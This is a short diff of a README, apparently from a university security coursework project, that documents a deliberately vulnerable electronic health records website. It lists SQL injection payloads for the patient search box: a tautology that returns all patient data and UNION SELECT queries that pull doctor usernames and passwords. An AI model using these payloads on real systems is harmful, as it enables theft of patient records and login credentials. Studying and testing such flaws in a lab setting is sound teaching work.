bordean5/ELEC0138-23_24-Group_S/EHR website base version/README.md

 Patient search (after login):
 1. <<' OR '1'='1>>: get all patient data without name
-2. <<UNION SELECT password, username FROM Doctor -->>:  get all usernames
+2. <<UNION SELECT password, username FROM Doctor -->>:  get all usernames and passwords
-3. <<UNION SELECT username, password FROM Doctor -->>: get all user passwords